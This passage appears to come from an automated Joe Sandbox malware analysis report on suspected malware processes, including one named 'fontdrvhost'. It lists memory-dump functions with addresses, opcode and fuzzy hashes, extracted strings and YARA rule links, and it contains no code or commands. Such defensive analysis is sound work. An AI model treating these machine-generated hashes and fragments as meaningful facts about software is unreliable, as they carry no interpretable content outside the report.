                                                                                                                    • Instruction Fuzzy Hash: C321073170DC184FE768EA0CE88ADB973D1EF9A32131111BAE58EC7166E915FC8287C1
                                                                                                                    Function 00007FFD34560C25 Relevance: .1, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 81ee992d48ce40efb8b56e2b80662a6d8814d1dede73db94a8983a1e71899b25
                                                                                                                    • Instruction ID: 8e6dbb530fc6496405b9985901f6bca5b991d77022cc67ebc2ec0e575901d0be
                                                                                                                    • Opcode Fuzzy Hash: 81ee992d48ce40efb8b56e2b80662a6d8814d1dede73db94a8983a1e71899b25
                                                                                                                    • Instruction Fuzzy Hash: 7721B127F0D6899FE713A76898610EDBB60EF53330F1452B2D148CA192DA2C69469681
                                                                                                                    Function 00007FFD345646FE Relevance: .1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2cd324d9f0fcbe24f5ec4be7d69cc0d41fa31b05318bfb7aeffe34a1140a2ef8
                                                                                                                    • Instruction ID: bfc2cdc866be95d5a932126b1e5b8a49613291bbe1902d7103a215f36ff305fc
                                                                                                                    • Opcode Fuzzy Hash: 2cd324d9f0fcbe24f5ec4be7d69cc0d41fa31b05318bfb7aeffe34a1140a2ef8
                                                                                                                    • Instruction Fuzzy Hash: F0216831E0C82E4EEB95EB18D8A46B862E1FF57321F5421B9D54EE3292DF2C6C419744
                                                                                                                    Function 00007FFD345608F8 Relevance: .1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction ID: 5259cad82f6ded46ae330144746009d48002be112cdc8c684a468471eea4e256
                                                                                                                    • Opcode Fuzzy Hash: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction Fuzzy Hash: F501F732F4E92D0B9669D41D989A936B3C2DBCBB307152279E98FC3245DD28AC5356C0
                                                                                                                    Function 00007FFD34560C38 Relevance: .1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e26cd31a007bd143943e23dd972c97510eb7acdbfa02cbfefbe7b7e9c8eae5bc
                                                                                                                    • Instruction ID: 6201d993d8fc003ef434820ecf6f20fed1ae0bc34c3b8ca029e66b1ddafab57d
                                                                                                                    • Opcode Fuzzy Hash: e26cd31a007bd143943e23dd972c97510eb7acdbfa02cbfefbe7b7e9c8eae5bc
                                                                                                                    • Instruction Fuzzy Hash: AE11A036F0E68D9FF713DB2888A11ADBFA0EF43720F1555B2C144DB192EA3C5A469781
                                                                                                                    Function 00007FFD34560C48 Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8cb90daa4278aadba33b2ae909e710c06c14e580c5852a5b5d00613605b38984
                                                                                                                    • Instruction ID: 41562da05579added6d87a0087471974e0f594298f5713fbf2fa797b637c9cab
                                                                                                                    • Opcode Fuzzy Hash: 8cb90daa4278aadba33b2ae909e710c06c14e580c5852a5b5d00613605b38984
                                                                                                                    • Instruction Fuzzy Hash: 15016936E0D2899FEB12DB6888A009DBFB0AF43320F1551B6C544DB192EA3C5A45EB81
                                                                                                                    Function 00007FFD3456480A Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f859a5656836d77494a98f94a1655e68e525d03b7fd17e3130365e9a7ebba587
                                                                                                                    • Instruction ID: 402209cd714baf1f9c6315894657b9ddb7ed46ae0655a2723fb04b5860e3d389
                                                                                                                    • Opcode Fuzzy Hash: f859a5656836d77494a98f94a1655e68e525d03b7fd17e3130365e9a7ebba587
                                                                                                                    • Instruction Fuzzy Hash: BA016D31F0C41A4FEA99FB2894A46B862D2EF57321F0550B5D54ED3292DE2CAC429644
                                                                                                                    Function 00007FFD34560C50 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1148d6377518ce851e27891ff249282026dafd9fb6c473c557b6f80bfa0906b1
                                                                                                                    • Instruction ID: 2daa9ec87ee28ae2cbba66ac538e2116de47b4015cf53b187475cbab50b52308
                                                                                                                    • Opcode Fuzzy Hash: 1148d6377518ce851e27891ff249282026dafd9fb6c473c557b6f80bfa0906b1
                                                                                                                    • Instruction Fuzzy Hash: CA015A35E0D3899FEB12DB6888A409DBFB0AF03320F1451E6C544DB192EA3C5A44E741
                                                                                                                    Function 00007FFD345647D6 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction ID: 8763f95ddf90e4aea5c17e129fe925895bd5189fe5287db146f6a03a5ebaa79a
                                                                                                                    • Opcode Fuzzy Hash: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction Fuzzy Hash: 17F05431F0C4294AEB96EA14D8A46B86391EF57331F1421B9D94ED31D2CE2C6D835648
                                                                                                                    Function 00007FFD3456393E Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction ID: 90851bd60e6674cc9f421617cbf7425d049d199c3d12c1ca61b2ee90d0651e7c
                                                                                                                    • Opcode Fuzzy Hash: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction Fuzzy Hash: 4DF01C31E0C0064BFB959644C4A0BBA33A5DF56320F181079DA4ED32C1DD2CA9419709
                                                                                                                    Function 00007FFD345659AC Relevance: .0, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 425f76dd92ec4dd36934a5d1b63a7046f68d1f9976dc512e753f6ec639e6dc14
                                                                                                                    • Instruction ID: c7bfb65fa7422a5c6158f945e4b3efc4ea4207003c6022c1ea6b0e75bc457a81
                                                                                                                    • Opcode Fuzzy Hash: 425f76dd92ec4dd36934a5d1b63a7046f68d1f9976dc512e753f6ec639e6dc14
                                                                                                                    • Instruction Fuzzy Hash: F7E0CD21F0C85B07F669E754C4766BC51926F84315F8411B5D60CE72D3DD2C6F0583C1
                                                                                                                    Function 00007FFD34560B95 Relevance: .0, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction ID: 97261e78cb310111d530b83f7af1a2dd14e57a6d62dddd683722aa4715897ae2
                                                                                                                    • Opcode Fuzzy Hash: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction Fuzzy Hash: ABD0A73066954A4FDA01B73CC8898547BA0EB0F224BD510F1D009C7561D50D4C558B00
                                                                                                                    Function 00007FFD34560CBF Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction ID: 742d2502906de8fc2a2c6c1b05cb9bbd5b5e2fb4d8f3e1f54805611e23c2c237
                                                                                                                    • Opcode Fuzzy Hash: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction Fuzzy Hash: C9E01735F0960ACBFB01EB54C4D46AEB7A1EB52721F1082B5C501C7289DB7CA684EA80
                                                                                                                    Function 00007FFD345606A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction ID: de2ea020ad61640ef8e40a0b67cdc873ade2ef5fac3099df56b1d3f84cd23727
                                                                                                                    • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction Fuzzy Hash: BFC04C06F5E51F01B417B56E54E60ACB2415BD7A70FD52172D70CD10C19D8D20D5A156
                                                                                                                    Function 00007FFD345612E0 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction ID: a50990506d9201a2f15d54500c1484066e0405552ff1ffe2eb2556d764c299cd
                                                                                                                    • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction Fuzzy Hash: 88C04C34A518098FCA48EB69C89591477A0FB1A215BD61190E409C7271E65DDCD5D741
                                                                                                                    Function 00007FFD345606C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction ID: b3c5cdccc0aa1ee8565224c2d76708e0fed1863bf9f8249f2238a3161b01cd25
                                                                                                                    • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction Fuzzy Hash: 88B01200D6640F00A40A357A08D20A470405B46120FC02070D60CC1081988D10942242

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD345609B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: 9bc2b293896c0baef41746b4921a91980c9f281a934a55c9448ee0fb6a910f5c
                                                                                                                    • Instruction ID: 7f7c9cd1ebcbb4773652999d575a23293d0b24c1fb6050a7d2b30b96cbfc5eb1
                                                                                                                    • Opcode Fuzzy Hash: 9bc2b293896c0baef41746b4921a91980c9f281a934a55c9448ee0fb6a910f5c
                                                                                                                    • Instruction Fuzzy Hash: BE419407F1D46B67EA2A37FD74611FE6B889FA2375B084377E14C990E34D0CA88582E5

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD34560D48 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481
                                                                                                                    • Opcode ID: 22d5aa4240c2d06ce25f161dc1babd447f9b7fa076488c09736abae15ab5bf01
                                                                                                                    • Instruction ID: 0d7a6c124fa4bb30a10ba1f1c9575ea556581adcfc6e2c382a70c64a525418ad
                                                                                                                    • Opcode Fuzzy Hash: 22d5aa4240c2d06ce25f161dc1babd447f9b7fa076488c09736abae15ab5bf01
                                                                                                                    • Instruction Fuzzy Hash: 1591D572A1CA998FE799DB6C88A57A97FE1FB56310F4402BAD049D72E2DF7D1800C700
                                                                                                                    Function 00007FFD345912E5 Relevance: .5, Instructions: 495COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 56c3eae723d49ab7ba9e4c832991a03d1e3265d844378868f3c1985d4ab712f4
                                                                                                                    • Instruction ID: fa1945ab3431f7883eeec910ad59c85efda035f426f13613813227cc43e0a332
                                                                                                                    • Opcode Fuzzy Hash: 56c3eae723d49ab7ba9e4c832991a03d1e3265d844378868f3c1985d4ab712f4
                                                                                                                    • Instruction Fuzzy Hash: EED16C25E2D6A60BF32E492848A31B577A1EB93205B2D53BDCEDBC75C7DC1C680792C1
                                                                                                                    Function 00007FFD34560E43 Relevance: .2, Instructions: 173COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17d228ab5f6af5de8d42cc1cab218942b3ed6e5c873c181b82b300759464fb3f
                                                                                                                    • Instruction ID: 0d9e2149e75c0619702a85af6a73f5bc8e1223d693756be6875e49a5b5dba220
                                                                                                                    • Opcode Fuzzy Hash: 17d228ab5f6af5de8d42cc1cab218942b3ed6e5c873c181b82b300759464fb3f
                                                                                                                    • Instruction Fuzzy Hash: 0E51C172A18A5A8EE798DF5C88A57A9BFD1FB96320F4002BED049D77D1DBB91411C700
                                                                                                                    Function 00007FFD34570CFC Relevance: 8.4, Strings: 6, Instructions: 942COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *`4$HIa4$PXa4$P\a4$pqa4$wa4
                                                                                                                    • API String ID: 0-3421069954
                                                                                                                    • Opcode ID: edd1dd5c5ea5b1b0628afcb3ae25f2a5457a88fc82449f5fe66891141076ac5d
                                                                                                                    • Instruction ID: aa736826f0a8059433f1aa5750e5f45f2c7c8f3770f6e02564e07edced19a50a
                                                                                                                    • Opcode Fuzzy Hash: edd1dd5c5ea5b1b0628afcb3ae25f2a5457a88fc82449f5fe66891141076ac5d
                                                                                                                    • Instruction Fuzzy Hash: 4A62C221F1C91A4BEB99EB2C88E66B877D2FF95350F0445B9D10DD3292DE2CBC819B41
                                                                                                                    Function 00007FFD34571305 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P\a4$wa4
                                                                                                                    • API String ID: 0-1460514738
                                                                                                                    • Opcode ID: b97b6dfdeb44d52f7de8e4c65c897a987f59e99a7846baede782048e2ef77c93
                                                                                                                    • Instruction ID: b4fe74e86620093e188b58040f647469ebb9442d6fd988a4c0098000bcd87208
                                                                                                                    • Opcode Fuzzy Hash: b97b6dfdeb44d52f7de8e4c65c897a987f59e99a7846baede782048e2ef77c93
                                                                                                                    • Instruction Fuzzy Hash: B8919131F1C90A4BEB99EF2888E167877E2FF95310F5445B9D04ED3282DE2CAC429B41
                                                                                                                    Function 00007FFD345935F5 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @aD4
                                                                                                                    • API String ID: 0-1189369986
                                                                                                                    • Opcode ID: e00c8f75306acc8ed76c4a5a66831b5e760a8a5d0d18f7665462425984e69e05
                                                                                                                    • Instruction ID: b9c65bd4fa050a338c83a5995d978e30df5a58d65e3524e6fa9910025258a633
                                                                                                                    • Opcode Fuzzy Hash: e00c8f75306acc8ed76c4a5a66831b5e760a8a5d0d18f7665462425984e69e05
                                                                                                                    • Instruction Fuzzy Hash: 3291D421F1C94A4FEB9DEB2884B627576E1EFAA300F0441BAE54DC72C7DD2CAC459781
                                                                                                                    Function 00007FFD34560998 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 87a4
                                                                                                                    • API String ID: 0-1756189204
                                                                                                                    • Opcode ID: 5f746f33a5758263a12db587e667834e1da6f90c70b4e2d9c5dcba44f53ee52c
                                                                                                                    • Instruction ID: f0295385888bc102a9139df7fa104940b9bb97b0f43e05e54361d102ad45afd9
                                                                                                                    • Opcode Fuzzy Hash: 5f746f33a5758263a12db587e667834e1da6f90c70b4e2d9c5dcba44f53ee52c
                                                                                                                    • Instruction Fuzzy Hash: 2E212821B5C9194FF788FB2C80AA6B577C6DB99331F5000B9E40DC32E3DE2CAC818681
                                                                                                                    Function 00007FFD3459D9D8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 0-2852464175
                                                                                                                    • Opcode ID: 00aa83b5a87cb196ae42f3845d0f9fe301abbad2ab879674af1d5776a6999ea8
                                                                                                                    • Instruction ID: 02d4b6ffe16e02470cd91f550bd0a0de1a727a5c83d3796cc7f72ecf5798393d
                                                                                                                    • Opcode Fuzzy Hash: 00aa83b5a87cb196ae42f3845d0f9fe301abbad2ab879674af1d5776a6999ea8
                                                                                                                    • Instruction Fuzzy Hash: 99019A31F0851A8BEB999A18D4A53FD73E1EF85300F440039E209D72C1CE2CA888C780
                                                                                                                    Function 00007FFD3459A649 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 3cdca01616814c9c0517f5651d5cb60281db3131add8036b17ac6baf02edda43
                                                                                                                    • Instruction ID: c37388d79ee6114d04c95b876a493dd134dbb7c64b203bbb288356bb706e655f
                                                                                                                    • Opcode Fuzzy Hash: 3cdca01616814c9c0517f5651d5cb60281db3131add8036b17ac6baf02edda43
                                                                                                                    • Instruction Fuzzy Hash: 94F0656190E7C44FCB16DA3888694557FA0EF6720174A52EEC045CF1A3EA1DD885C711
                                                                                                                    Function 00007FFD34591EF9 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: caec905013c34235ab15f3c7ddfec50e83176b344827737a1c9c8424fca9d588
                                                                                                                    • Instruction ID: f30fcbc5a71dba2870769358b87ffc4f3834dd58e6427fa43758bd00718690f9
                                                                                                                    • Opcode Fuzzy Hash: caec905013c34235ab15f3c7ddfec50e83176b344827737a1c9c8424fca9d588
                                                                                                                    • Instruction Fuzzy Hash: 0EF06D61A0E3C44FCB16AA348869455BFA0EF6721174A51EFC046CF1A3EA2D8889C701
                                                                                                                    Function 00007FFD34573F09 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: d71f91e2e835abecfea5e4f0ba85d64d0e321eb78f78bf8e6aa98e64a2dbe1d2
                                                                                                                    • Instruction ID: a6a1eaa30195cba23ff3e19a8bc8304a73dd5d9be99fdba7f704f2fcb5a50227
